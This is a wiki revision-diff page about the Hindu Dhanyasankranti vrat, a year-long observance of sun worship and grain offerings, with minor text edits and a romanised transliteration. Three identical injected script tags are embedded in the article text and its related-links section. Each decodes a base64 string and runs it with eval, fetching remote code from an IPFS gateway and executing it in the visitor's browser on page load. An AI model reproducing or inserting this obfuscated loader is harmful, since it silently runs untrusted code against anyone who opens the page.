Difference between revisions of "धान्यसंक्रान्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*इसका आरम्भ अयन या विषुव दिन पर होता है।
 
*इसका आरम्भ अयन या विषुव दिन पर होता है।
 
*यह व्रत एक वर्ष तक किया जाता है।
 
*यह व्रत एक वर्ष तक किया जाता है।
Line 5: Line 5:
 
*प्रत्येक दल पर पूर्व से आरम्भ कर आठ विभिन्न नामों से सूर्य की पूजा की जाती है।
 
*प्रत्येक दल पर पूर्व से आरम्भ कर आठ विभिन्न नामों से सूर्य की पूजा की जाती है।
 
*किसी ब्राह्मण को एक पसर (प्रस्थ) अन्न दिया जाता है।<ref>इसी से धान्यसंक्रान्ति की संज्ञा बनी है</ref>  
 
*किसी ब्राह्मण को एक पसर (प्रस्थ) अन्न दिया जाता है।<ref>इसी से धान्यसंक्रान्ति की संज्ञा बनी है</ref>  
*यह प्रत्येक मास में किया जाता है।<ref>हेमाद्रि (व्रतखण्ड, जिल्द 2, 730-732, [[स्कन्द पुराण]] से उद्धरण)</ref>
+
*यह प्रत्येक मास में किया जाता है।<ref>हेमाद्रि (व्रतखण्ड, जिल्द 2, 730-732, [[स्कन्द पुराण]] से उद्धरण</ref>
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:51, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • isaka arambh ayan ya vishuv din par hota hai.
  • yah vrat ek varsh tak kiya jata hai.
  • kuankum se ath daloan vala kamal khiancha jata hai.
  • pratyek dal par poorv se arambh kar ath vibhinn namoan se soory ki pooja ki jati hai.
  • kisi brahman ko ek pasar (prasth) ann diya jata hai.[1]
  • yah pratyek mas mean kiya jata hai.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. isi se dhanyasankranti ki sanjna bani hai
  2. hemadri (vratakhand, jild 2, 730-732, skand puran se uddharan

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>